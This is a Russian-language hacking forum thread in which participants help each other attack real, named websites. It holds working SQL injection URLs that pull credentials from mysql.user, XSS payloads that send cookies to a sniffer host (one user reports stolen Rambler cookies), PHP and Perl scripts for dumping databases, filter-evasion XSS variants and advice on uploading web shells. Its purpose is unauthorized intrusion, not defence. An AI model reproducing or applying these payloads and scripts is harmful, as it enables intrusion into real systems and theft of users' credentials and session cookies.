использовать concat, а не concat_ws
=)

использовать concat, а не concat_ws
=)
я же написал, что там есть пустые поля и concat возвращает null

я чё-то не понял наверное
select concat(col1,':',col2,':',col3) from table limit 0,1
предположим что у тебя колонка col2 имеет значение null
функция вернёт тебе
blabla1::blabla3

Да и concat_ws тоже самое вернёт вроде
щас тебе в асю стукну

неа, я сейчас посмотрел Piflit правильно говорит, у меня вот как получилось:

SELECT concat_ws(':','ff',if (username <> '',username,'null')) FROM `user`

попробуй сам, у меня мускул 5, если функция concat получает хоть одно значение null, то возвращает null

например:
SELECT concat(':','ff',null) FROM `user` вернет null

Piflit (01:42:38 21/01/2008)
среди этих полей есть нулл и весь конкат возвращает нулл - а дожен результат запроса

Piflit (01:42:58 21/01/2008)
а про конкат_вс поля едут - а мне надо выводить это в ровную табличку

ну тогда делай по аналогии с моим примером, или дай структуру, ну вобщем поконкретней опиши, я наверное смогу помочь в этом вопросе

http://biophysics.asu.edu/banf/show_files.php?user_id=-3+union+select+concat(user,':',password,':',host), 2,3+from+mysql.user+limit+2,1

здесь колонка password вернула null
всё выводится
зачем вам самим null подстовлять в функцию?

незнаю, пробую на phpmyadmin, null подставляю сам просто для примера, пробую на реально существующей таблице, в которой есть значение null, concat выдает null, хм вот сейчас посмотрел mysql.user поле password у пользователя root, пустое, но не null, при этом concat действительно работает как говорит Spyder, а есть еще одна табличка там конкретно прописано, что значение поля username null, при выборке из этой таблички и этого поля concat выдает null, а concat_ws игнорирует, так как говорил Piflit

Скорее всего это связано с типами полей, хотя хз

2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast(@@version/**/as/**/int)='1

уязвимость http://images.yandex.ru/
поиск ввожу </script><script>alert(document.cookie)</script> и появляется алерт пытаюсь сделать скрипт типа <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> тогда ничего не происходит он просто пытается это найти. как правильно использовать данную ксс?
----------------------------------------
на рамблере
ксс http://www.rambler.ru/db/support/feedback.shtml?name="<script >alert()</script>выводит алерт
пытался сделать скрипт типа <script img src="http://s.netsec.ru/mda.gif"> но мне на сниффер приходило только
Time: 20.01 -10.35.48
IP: 80.64.91.1
Host: http://www.rambler.ru/db/support/feedback.shtml?name="<script src="http://s.netsec.ru/frigid20.gif?" document.cookie;></script>
Browser: Mozilla/5.0
как правильно использовать данный ксс?

1) яндекс
там фильтруются ; ? " + поэтому твой скрипт и не работает.
2) рамблер
фильтруется +

необходимо использовать кодирование.

У меня в опере сработало вот так

http://www.rambler.ru/db/support/feedback.shtml?name=</td></tr></table><script>alert(99)</script>

У меня в опере сработало вот так

http://www.rambler.ru/db/support/feedback.shtml?name=</td></tr></table><script>alert(99)</script>

под "сработало" ты имееш ввиду то что куки на сниффер пришли?

Нет, у меня под рукой нету снифера, так бы проверил. Закодируй + на %2b и в скрипте заюзай

location.href='http://путь_до_снифера.gif?'%2bdocument.cook ie

А еще лучше все закодируй, чтоб палева не было =)

для рамблера:

http://www.rambler.ru/db/support/feedback.shtml?name=<IMG%20SRC=javascript:location.href='адрес_с� �ифера'%2bdocument.cookie>

А еще лучше
http://www.rambler.ru/db/support/feedback.shtml?name=<script src=http://[путь к файлу с яваскриптом]></script>

либо

http://www.rambler.ru/db/support/feedback.shtml?name=<script>eval(unescape([тут эскейпенный код]))</script>

Короче, набросал на скорую руку снифер, нормально куки пришли с рамблера :)

Короче, набросал на скорую руку снифер, нормально куки пришли с рамблера :)
респект! работает

а с яндексом как? не могу чето ему целку вскрыть....

Так, как я написал про рамблер... Точно так же сработает

Так, как я написал про рамблер... Точно так же сработает
но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор

но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор
Ссылку не на сниффер, а на файл, в котором код, отправляющий куки на сниффер

Ссылку не на сниффер, а на файл, в котором код, отправляющий куки на сниффер
мм... я пока плохо разбираюсь в этом( а какой должен быть код в файле?

2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast(@@version/**/as/**/int)='1
отлично, спс :) а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается...

Хм, тут нарисовалась трабла. Я проводил скулю на сайтенге, и при -1 union select 1/*
выдается ошибка The used SELECT statements have a different number of columns, хотя order by показывает что полей именно 1, но это не важно, я начал работать с подзапросами и при -1 union select 1 from users/* вылезла ошибка Table 'dk.users' doesn't exist а при запросе -1 union select 1 from information_schema.tables почему то опять же вылезла The used SELECT statements have a different number of columns Значит ли это что information_schema.tables существует и к ней есть доступ ?

Да. доступ к таблице есть.
Запросов может быть несколько.
пробуй union select 1,2/* и тд. пока не попадешь на праильное кол-во колонок

Да. доступ к таблице есть.
Запросов может быть несколько.
пробуй union select 1,2/* и тд. пока не попадешь на праильное кол-во колонок
А разве если бы кол-во колонок было неверное мне бы выпадало Table 'dk.users' doesn't exist ?
А, все, пасиб Basurman
Подбирать поля - лень, я нашел более удобную скулю на этом же сайте, доступ к information_schema действительно существует =) Еще раз всем пасиб

да. именно так и происходит

отлично, спс :) а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается...
вот смотри:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast((SELECT/**/TOP/**/1/**/table_name/**/From/**/information_schema.tables/**/where/**/table_name/**/not/**/in/**/('Rating1','HelpMessage'))/**/as/**/int)='1
в скобки, которые после not in подставляй очередное полученное имя таблицы и таким образом перебирай имена всех таблиц, а вобще почитай вот эту статью: Провидение Иньекций в MSSQL сервер от Microsoft (http://forum.antichat.ru/thread30501.html)

текст
можно было просто тыкнуть в статью, я её не читал :D пасиба, вопрос закрыт.

я подобрал количество колонок но нет полей для вывода как поступать?

брутить посимвольно.

Если известен путь к папке с правами на запись и видной из веба, попробуй записать в файл
-1 union select 1,2,...,n from some_table into outfile "/path/www/file.txt"/*


blackybr: + from

Короче искал инъекцию,а нашел интересную уязвимость,дело в том что я сижу с телефона,и браузер опера мини(java) при загрузке объемных страниц ,разбивает их на несколько(в зависимости от веса,картинок,и т.д),так вот при составлении запроса на sql инъекцию таким образом: http//site.ru/?item=1+order+by+100/*,страница из скажем 15кб разрослась до 1500кб,тоесть просто размножился текст в 100 раз,и при этом выдало такую ошибку:PHP Fatal error: Maximum execution time of 60 seconds exceeded in E:\xxx.ru\wwwroot\lost\index.php on line 287.

Вопрос такой:с чем это связано и значит ли что если я увеличу число в запросе,к примеру до 1000000,то получится типа ддос атаки?

Вопрос такой:с чем это связано и значит ли что если я увеличу число в запросе,к примеру до 1000000,то получится типа ддос атаки?
Имхо, ты скорее всего заддосишь собственный телефон:)

-1 union select 1,2,...,n from some_table into outfile "/path/www/file.txt"/*


blackybr: + from
Последний раз редактировалось AFoST, Вчера в 18:39. Причина: Спасибо blackybr
ога, блекибр прочитал в умной статье или умной книжке что использование into outfile обязательно происходит с выборкой из какой либо таблицы, тут даже Елект пытался это доказать, видимо вы на локалхосте никогда не выполняли select 1 into outfile '/tmp/blabla.txt', ставлю штуку баксов что при наличии файл прив и папки доступной на запись создасться файл blabla.txt с записью 1\n, и без всяких там from some_table
кароче бред)

ога, блекибр прочитал в умной статье или умной книжке что использование into outfile обязательно происходит с выборкой из какой либо таблицы, тут даже Елект пытался это доказать, видимо вы на локалхосте никогда не выполняли select 1 into outfile '/tmp/blabla.txt', ставлю штуку баксов что при наличии файл прив и папки доступной на запись создасться файл blabla.txt с записью 1\n, и без всяких там from some_table
кароче бред)
Умный спайдер, ты читать умеешь? Там написано
-1 union select

AFoST, и чё дальше?
ты бы лучше убрал from some_table и поробовал записать файл без этой хни, а потом бы тут отписал, ога?

into outfile можно в любое место вставить, хотя после select 1, хоть после union select 1, хоть после limit или order by

AFoST, и чё дальше?
ты бы лучше убрал from some_table и поробовал записать файл без этой хни, а потом бы тут отписал, ога?
Попробовал на локалхосте. И правда работает =\ Spyder, беру свои слова обатно. Хотя при sql-инъекции раньше сколько нет пробовал - никогда не получалось =\

ставлю штуку баксов что при наличии файл прив и папки доступной на запись создасться файл blabla.txt с записью 1\n, и без всяких там from some_table

Если стоит мускуль третьей версии, штуку можно и проиграть =) А если же 4-5 версии, то да, from some_table не нужно

hmm , что можно сделать если точка меняется на _ (xss) ? :/

hmm , что можно сделать если точка меняется на _ (xss) ? :/
a src="" не пашет?

ага , получается http://www_mysite_ru/

Здраствуйте :)
Возник вопрос:
К примеру через скуль могу прочитать файл, /etc/passwd , он такого вида:
: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false plusdeux34:x:1000:1000:plusdeux34,,,:/home/plusdeux34:/bin/bash sshd:x:100:65534::/var/run/sshd:/bin/false mysql:x:101:104:MySQL Server,,,:/var/lib/mysql:/bin/false bind:x:103:105::/var/cache/bind:/bin/false postfix:x:104:107::/var/spool/postfix:/bin/false web:x:1002:1001::/var/www/web/: vmail:x:5000:5000::/var/spool/vmail/: sepro:x:1003:1003:SSH Sepro,1,,:/home/sepro:/bin/bash clamav:x:109:109::/var/lib/clamav:/bin/false amavis:x:105:110:AMaViS system user,,,:/var/lib/amavis:/bin/sh dcc:x:106:111:DCC System User:/var/lib/dcc:/bin/false dspam:x:107:112:DSPAM,,,:/var/spool/dspam:/bin/false ntp:x:113:113::/home/ntp:/bin/false spampd:x:114:114::/nonexistent:/bin/false
Что мне это даст? Ничего там понять не могу... :(
Просто зелёный ещё совсем, поможет ли мне это залить шелл, и какую информацию я из этого /etc/passwd могу подцепить? Ногами не пинайте плз...
Ткните на ссылку-поиск замучил-ничё не нашёл. Спасибо.

кроме имён пользователей и их хом дир ничего

Вообщем есть инекция, но стоит фильтрация на union и select, при добавлении union либо select в запрос срабатывает редирект на другой сайт. Можно ли тут что то сделать? Как это обойти?

не свеб.ру?) попробуй передать через кукисы, пост.. на свебе например фильтр только на гетовые переменные

не свеб.ру?) попробуй передать через кукисы, пост.. на свебе например фильтр только на гетовые переменные
не, не свеб.ру, т.е. передать через кукисы, попробывать внедрить инекцию в переменные куксов? а если куксов нет на сайте :) можно как нибудь зашифровать?

допустим переменная xek=123
то ты также пробуешь передать ее или постом.. или в кукисах..

union и select никак не обойдешь.. правда если на селект нет фильтра то можно подзапросами, или на оба ?

да, на оба


blackybr:
тогда напрямую обойти не получится.
естественно я этого не утверждаю, т.к. не знаю что там за код.. а вслепую врядли.

помогите плиз с этим:

http://www.uralweb.ru/rating/index.php?rating_sel="123

Там посимвольный брут вот http://forum.antichat.ru/showpost.php?p=565034&postcount=4 тебе в руки.

Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?

помогите ребята с скуль иньекцией.
Если ввожу адрес:
modules.php?name=News&pagenum=2'то вылазит ошибка:
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '192.168.137.'' at line 1
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/modules.php?name=News&pagenum=2'')' at line
а если пишу всякую хрень БЕЗ ковычки, то ошибки нету... Можно ли этоим воспользоваться?

и ещё вопрос: если есть локальный инклуд, но фильтруются .. (две подряд идущие точки), то можно ли воспользоваться этим инклудом, если необходимо подняться на несколько уровней вверх?

Здравствуйте! :)

Подскажите, как залить шелл на сервер, если есть логин и пароль администратора DataLife Engine (апдейт конца 2007 года)?

Спасибо! :)

Может кто подскажет, видно что есть sql инжект. все подходит , но начинаю подбирать поля, и бесплоезно сколько бы не ставил там 1,2...30/* и все равно The used SELECT statements have a different number of columns, и что делать мож кто подскажет?

Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
банальный дампер на пхп или перл, учти что в логах будет много какашек
скрипт:
<?php
set_time_limit(0);
ignore_user_abort(true);
$s=1;
$f=39913;
$fph = fopen ("result.txt", 'a+');

for ($i=$s; $i<=$f; $i++) {
$aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a )+from+information_schema.tables+limit+".$i.",1/*");
$res=null;

$pattern ="/:::(.+):::/";
preg_match_all($pattern, $aps, $out);
$res=array_values(array_unique($out[0]));
fputs ($fph, $res[0]."\r\n");

sleep (5);
}
fclose ($fph);
?>

а если пишу всякую хрень БЕЗ ковычки, то ошибки нету... Можно ли этоим воспользоваться?
Писать не хрень, а запрос мб?

Может кто подскажет, видно что есть sql инжект. все подходит , но начинаю подбирать поля, и бесплоезно сколько бы не ставил там 1,2...30/* и все равно The used SELECT statements have a different number of columns, и что делать мож кто подскажет?
Попробуй перебирать с помощью ORDER BY. Почитай об этом тут http://forum.antichat.ru/thread43966.html.

А еще там может быть два запроса с разным количеством полей. В этом варианте посимвольный брут.

ордер бай не пашет, вроде
http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1/*
посмотрите кто нить как там

ордер бай не пашет, вроде
http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1/*
посмотрите кто нить как там

Пашет, попробуй так

http://atv.worcsracing.com/tracks.php?ID=-1+order+by+26/*

и так

http://atv.worcsracing.com/tracks.php?ID=-1+order+by+25/*


http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,1,1,1,1,1,1/*

4.0.21-nt/worcsatv/root@localhost

Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
Полчаса назад писал для себя:
#!/usr/bin/perl

use LWP::UserAgent;

$ua = LWP::UserAgent->new;

$x=0;
$y = $ARGV[0];
open(TT,">","mda.txt") or die "$!";
while ($x<=$y)
{
$omfg = $ua->get("СКУЕЛЬ")->content;
$omfg =~m%:::(.*?):::%i)
$table = $1;
print TT $table, "\n";
$x++;
}
close TT;

В get("СКУЕЛЬ") должна быть скуль вида:
http://site.com/index.php?id=1+union+select+concat(0x3a3a3a,table_ name,0x3a3a3a)+from+information_schema.tables+limi t+$x,1/*

Участки выделенные красным обязательны в запросе. Запускаешь скрипт, вводишь кол-во таблиц/полей/ещё чего то, которое нужно сдампить. Всё сохраняет в текстовик mda.txt

ЗЫ Писалось на скорую руку для себя, так что любители дое*аться к коду идут лесом(:

.Slip , Constantine, спасибо за отклик! Только вот не бейте ногами, объясните как ентот скрипт в винде то запустить:(

устанавливаешь perl-интерпретатор. Потом
пуск->
выполнить->
cmd->
<путь к интерпретатору>/perl.exe <путь к скрипту>/script.pl

.Slip , Constantine, спасибо за отклик! Только вот не бейте ногами, объясните как ентот скрипт в винде то запустить:(
Или так как написал Afost, или одно из двух(:

Если большая база (мне пришлось 1к. дампить), то что бы не спалиться дико, запускай с шелла. Заливай файл с расширением .pl на сервер, и запускаешь такой командой:
perl blablabla.pl 400
где 400 - нужное кол-во записей для сохранения. Скорей всего тебя скинет с шелла, т.к. скорость работы скрипта невысокая (будет тайм-аут), то ждёшь энное время и заходишь заново в папку , там уже должен лежать файл mda.txt . Если его размер 0 байт, то ждёшь ещё= ) Если всё таки хочешь запускать со своего компа, то ставишь актив перл и в cmd пишешь blablabla.pl 400

Aга, спасибо. Но вы уж простите, не могу отблагодарить плюсиком:( А вот этот шелл он должен быть получается на локальном хосте?

Нет, как раз с локалхоста ты можешь запустить через консоль(цмд). Шелл должен быть на любом стороннем серванте.

Так же не забываем про тулзу от SQLHack'a =)
на днях пришлось дампить 37к, так что как вариант)

Как делал я.
1)Писал подобный скрипт но на пхп.
2)заливал на хост и ставил диапазон 1..1000(например)
3)запускал
4)скрипт через некоторое время переставал работать, я смотрел на конечную запись и дописывал в скрипт нужный диапазон (например 439..1000)

АГА, а ваше мнение какой вариант лучше?
З.Ы. А Я могу оценить если репут. не меньше 10?

АГА, а ваше мнение какой вариант лучше?
З.Ы. А Я могу оценить если репут. не меньше 10?
Я же написал, что если база небольшая, то можешь и с локалхоста запускать. Если база большая, то запускай с шелла (если он у тебя есть)

Теперь понял, спасибо за оказанную помощь!!!

плз, доковыряйте ктото, у мя ума не хватает, а то намучался, так, что аж денвер пришлось устанавливать, чтоб не писать в ручную все колонки, скрипт забацал на вывод цифры и плюсика до 146 штук :D
а вещь-то думаю ценная, там платный мембершип и тп.

ну эт не главное, меня деньги не интересуют, меня больше процесс, так что главное распишите плз, что делали дальше, если получится :cool:

:confused: никак не подберу таблички и колонки, а information_schema.tables показывает "CHARACTER_SETS" а какой с него толк :mad:Access Denied

Таблицы:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
OLD_gathering
OLD_logos
bademails
chronjobs
chronjobs_old
david
email_settings
forum
gathering
jobs
jobs_categories
jobs_education
jobs_education_bu
jobs_focus
jobs_languages
jobs_my
jobs_my_search
jobs_states
keywords
logos
may2206
my_users
my_users32106
my_users_BACKUP_6_25_07
my_users_basic
my_users_bu
my_users_bu_jul_9_2007
noa_phone
phonebank_settings
privs
queries
tbl
temp103021435
to_import
transactions
update06_25_2007
user_groups
web_navigation
web_pages
web_pages_BACKUP
Дальше сам.

в хекс переводи, hex(my_users)=0x6d795f7573657273

table_name=0x6d795f7573657273

в хекс переводи, hex(my_users)=0x6d795f7573657273

table_name=0x6d795f7573657273
или char(my_users)=char(109,121,95,117,115,101,114,115 )

вопрос специалистам.
При проведении XSS при вводе код
alert(99)
заменяется на
alert&*#40;99&*#41;
(без звездочек)
Возможно ли обойти это и провести XSS? Можно ли заменить круглые скобки чем-то еще?

alert(99)
заменяется на
alert(99)

а разница какая?

Поправил уже

При проведении xss-кражи куков тебе возможно и не потребуются эти символы. Или тебе прямо обязательно нужен alert(99)?

чтоб не писать в ручную все колонки, скрипт забацал на вывод цифры и запятой до 146 штук
давно какт о тоже нопесал :D

#!/usr/bin/perl
while (1) {
print "\n\nNumber of columns\n";
$id = <STDIN>;
chomp ($id);
$x = 1;
print "-1+union+select+";
while ($x < $id) {
print "$x,";
$x++;
}
if ($x = $id) {
print "$x/*";
}
}

При проведении xss-кражи куков тебе возможно и не потребуются эти символы. Или тебе прямо обязательно нужен alert(99)?

Нет, необязателен алерт :) Но, например,

var i=new Image();
...

уже не прокатит. Да и уязвимость в тэге a - есть желание запихать ксс в style, где юзается url() - также со скобками

1)принудительно закрыть тег <a> и прописать <script>...</script>
2)

<a href="javascript:alert('XSS')">click</a>


=decoded=
<a href="javascript:alert('XSS')"></a>

Вот ещё несколько вариантов

<a href="j\;a\;v\;a\;s\;c\;r\;i\;p\;t\;:\;a\;l\;e\;r\;t\;(\;'\;X\;S\;S\;'\;)\;">click</a>

<a href="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;">click</a>

<a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">click</a>

<a href="javascript:alert&#x28;xss&#x29;">click</a>

<a href="javascript:alert(\;xss)\;">click</a>

<A HREF="http://66.102.7.147/">click</A>

<A HREF="http://1113982867/">XSS</A>

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>


все "\;" заменить на ;

Сенкс за наводку, попробую, но сразу скажу, там обрабатываются таким же образом и амперсанд, и кавычка, и апостроф (обратный апостроф не фильтруется)

Я загрузил на сервер шелл с именем img.php.gif
но сервер загрузил как img.php.1201468364.gif
каким образом мне запустить шелл?

Ищи на сайте локальный инлкуд и инклудь свой шелл

Я загрузил на сервер шелл с именем img.php.gif
но сервер загрузил как img.php.1201468364.gif
каким образом мне запустить шелл?
Попробуй загрузить кратинку с именем img.php%00.gif
Вероятность мала но все же есть что твой файл чудесным образом превратиться на сервере в img.php

Попробуй загрузить кратинку с именем img.php%00.gif
Вероятность мала но все же есть что твой файл чудесным образом превратиться на сервере в img.php

Непрошло..
Кста стоит тама e107
я юзал вот ето
_http://milw0rm.com/exploits/4099

Привет.У меня есть вопрос...

мой провайдер (raid.ru) использует какуюто особую программ
для работы пользователя с бд Programm ppo.c version 1.7
смог выжать конфиг в котором как понял прописаны все бд /var/www/db.raid.ru/cgi-bin/ora_agent.cfg
запросы формируются странным образом
https://db.raid.ru/cgi-bin/ppo/es_webface/point_access.services

es_webface название бд как я понял
point_access -хз
services -действие

если кто что знает подскажите...

Я так и не понял в чем вопрос? point_access - оракловский пакет, services -процедура

что есть:
Programm ppo.c version 1.7
каким образом формируются запросы
есть ли вариеции инжэкта через этот скрипт

вот погуглил нашел _http://oraclub.trecom.tomsk.su/util/webagent.htm
программа предназначена для связывания самого попу-
лярного веб сервера Apache и самого популярного сервера
баз данных OracleПрограмма просто передает на исполнение и забирает
результат родных Oracl'овских пакаджей

оффтоп: Ура, батарейка

Возможно раскрутить такую скуль,и если да то как?
Заранее спасибо.
код:

http://www.yerevan.ru/news/print.php?id=999+order+by+1/*

С помощью BENCHMARK-ка только получилось
http://www.yerevan.ru/news/print.php?id=128%20and%20id=IF(SUBSTRING(version() ,1,1)=4,1,BENCHMARK(299971,MD5(NOW())))

Можно ли в теге
<a href="123" <здесь> " target="_blank" class="bb-url"> 234 </a>
вставить javascript, который будет исполняться сразу при заходе на страницу(не выпонляя никаких действий)? Пробовал следующие варианты, но безрезультатно...

style=background-image:url(javascript:alert(1);)
sss='alert(1);this.sss=null' style='top:expression(eval(this.sss);)'
style=url(javascript:alert(1);)

С помощью BENCHMARK-ка только получилось
http://www.yerevan.ru/news/print.php?id=128%20and%20id=IF(SUBSTRING(version() ,1,1)=4,1,BENCHMARK(299971,MD5(NOW())))

а подробней можно,что это дает?

fobofob, вот здесь подробней http://forum.antichat.ru/thread35207.html

смысл в использовании подзапросов, т.е. если логическое выражение SUBSTRING(version(),1,1)=4 правильное, то просто id сравнивается с 1, а если неправильное, то выполняется BENCHMARK(299971,MD5(NOW())), а это достаточно долго, т.е если логическое выражение правильное, то запрос выполнится сразу, а если неправильное, то "загрузка" страницы ненадолго "зависнет"

AFoST, JavaScript внутри style работает только в ИЕ. В других браузерах не получится

AFoST, JavaScript внутри style работает только в ИЕ. В других браузерах не получится
Хреново :-( Другие варианты вобще есть для ФФ и оперы? А то жалко терять xss на таком ресурсе :-)

Видимо, нет. Рад был бы ошибиться. Для тэга A разве что прописать события onclick, onmouseover и т.д., но минусы тут очевидны - потребуется какое-то действие от пользователя

onmouseover, onclick это само собой..ладно, спасибо за помощь!

Привет! Если я знаю логин и пасс админа в ютуб, как можно залить шелл?

А если я знаю логин и пасс от админки google, как мне туда шелл залить??

PS ближе к телу, какой движок. Попробуй залить вместо видео =/

Вместо видео некан.
ЫЫ.. а как движок узнать?

Вместо видео некан.
ЫЫ.. а как движок узнать?
Если подписано внизу страницы что-то типа Powered by ***

Или надо искать по дорку такие же движки, где подписано...

в том дело что нет поверед бай, и в админке нет. В админке могу редактировать наблоны *.tpl, знаю их полный адрес

вот по дорку узнал
Copyright © 2008 Powered By TeacherTube, LLC

в том дело что нет поверед бай, и в админке нет. В админке могу редактировать наблоны *.tpl, знаю их полный адрес
Тогда это что-то типа clipshare или vshare youtube clone. Если редактирование получается, тогда вставляй между тегами {php}{/php} произвольный php код, это шаблоны smarty скорее всего. На странице, темплейт которой ты отредактируешь - код будет исполняться.

xxx в Sql hex, без кавычек. Кодер здесь --> http://hack-shop.org.ru/tools-code-encode

вопрос в следующем:

как в схеме +from+information_schema.columns+where+table_name= 'xxx'/*

заменить кавычки вокруг слова xxx ??????

вылетает следующее:


если юзать +from+information_schema.columns+where+table_name= char(39)xxx'/*
то выводит:



первая хавается, а вторая нет.

если +from+information_schema.columns+where+table_name= char(39)xxxchar(39)/*

то:



последний чар сливается со словом....
с хексом ситуация такая же!
если заменить 'xxx' (с кавычками вместе) на чар или хекс, то всё идет гуд, ошибки нету, но просто не выводятся данные, то есть нету тех циферок, которые пробиваются на страничке (надеюсь вы меня поняли) =)

вот что посоветуете сделать, что б всё-таки всё прошло удачно?????
Ты немного не правильно понимаешь процедуру кодировки через char(). В скул-запросе чар используется следующим образом
+from+information_schema.columns+where+table_name= char(ascii,ascii,...,)
например
+from+information_schema.columns+where+table_name= char(116,101,115,116)/*
char(116,101,115,116)=test БЕЗ ковычек.

Mambo Component AkoGallery 2.5b
кто может выложить?

кто может выложить?
SQL-инъекция
statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';';
function QuoteParam(s : string) : string;
{ на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами }
var
i : integer;
Dest : string;
begin
Dest := '"';
for i:=1 to length(s) do
case si of
' : Dest := Dest + '\;
'"' : Dest := Dest + '\"';
'\' : Dest := Dest + '\\';
else Dest := Dest + si;
end;
QuoteParam := Dest + '"';
end;

SQL-инъекция
statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';';
function QuoteParam(s : string) : string;
{ на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами }
var
i : integer;
Dest : string;
begin
Dest := '"';
for i:=1 to length(s) do
case si of
' : Dest := Dest + '\;
'"' : Dest := Dest + '\"';
'\' : Dest := Dest + '\\';
else Dest := Dest + si;
end;
QuoteParam := Dest + '"';
end;
компоненты для мамбы на делфи?... О_О

да это хня, вон нерезус сайт на осенблере писал )))

нашел sql injection на одном сайте все стандартно....
site.ru/index.php?id=-1+union+select+1,2,3,4...../*
version() -> 5.0.37
user() -> не рут
через INFORMATION_SCHEMA.TABLES можно просматривать таблицы...
на этом же сайте есть форум адрес типа forum.site.ru

как я понимаю через "INFORMATION_SCHEMA.TABLES" я должен видеть таблицы форума или же нет?

не обязательно
таблицы форума могут быть в другой бд и у юзера может не быть прав на доступ к ней
или вообще forum.site.ru на другом серваке лежит
Пробей через ревёрс айпи
http://www.seologs.com/ip-domains.html
если они на одном серве, просматривай table_schema и все таблицы

не обязательно
таблицы форума могут быть в другой бд и у юзера может не быть прав на доступ к ней
или вообще forum.site.ru на другом серваке лежит
Пробей через ревёрс айпи
http://www.seologs.com/ip-domains.html
если они на одном серве, просматривай table_schema и все таблицы
ip точно один.... если они в другой бд то получается я уже до них не доберусь ?

доберешься если сможешь повысить свои привелегии либо через ,fpe дибо через скрипты

В общем при передаче переменной query строки возникает ошибка:

http://site.ru/js/rs.php?query=SELECT *

Fatal error: Class 'FatalException' not found in /opt/vhosts/jnet/www/lib/DB.php on line 241

Что значит эта ошибка, и можно ли использовать уязвимость сделать sql иньецию?

вобщем то, эта ошибка не говорит о том, можно ли или нет провести инъекцию, просто когда возникает ошибка, вызываются функции определенного класса, а этот класс скрипт просто не может найти и все, попробуй сделать правильный скуль запрос

да скуль есть, вот нашел:
http://site/js/rs.php?query=1%20union%20select%201,version(),3,4, 5/*

смотрим исходник страницы, видим5.0.24a-standard-log

Прошу помочь если вообще способы залившке шелла через админку WordPress'a?

нашел sql injection на одном сайте все стандартно....
site.ru/index.php?id=-1+union+select+1,2,3,4...../*
version() -> 5.0.37
user() -> не рут
через INFORMATION_SCHEMA.TABLES можно просматривать таблицы...
на этом же сайте есть форум адрес типа forum.site.ru

как я понимаю через "INFORMATION_SCHEMA.TABLES" я должен видеть таблицы форума или же нет?

хорошо а могу я прикрутить UPDATE? и как это должно выглядить...

Всем привет , в кратце обьясню , всю жизнь работал СИ , вполне успешно никогда не жаловался =) ! Сейчас встал вопрос скажем так прогресса , вопрос куда двигаться от чего плясать , ЗАРАНЕЕ извеняюсь если задам кучу глупых вопросов , всё что я прошу подсказать , дальше сам разберусь .
есть сайтик нуу допустим http://portal.kurkino.net.ru/ насмотревшись всяких крутых роликов я начал с дуру подбирать всякие словечки в итоге нашёл "test.php" "/test/" "/test/admin/" как я понял сервак стоит на апаче , нооо дальше я не ушёл , и вот в чём просьба , скажите пожалуйста , а лучше киньте ссылки на статьи , предположим цель ну скажем выведать пороли пользователей или пороли админа , какие технологии и вообще знания стоят применять , Всё что связанно с соц инженерии сразу отпадает я и так всё знаю , уже не интересно , я крайне надеюсь что вы поняли чего я хочу , просто подскажите что к чему и зачем . Заранее спасибо

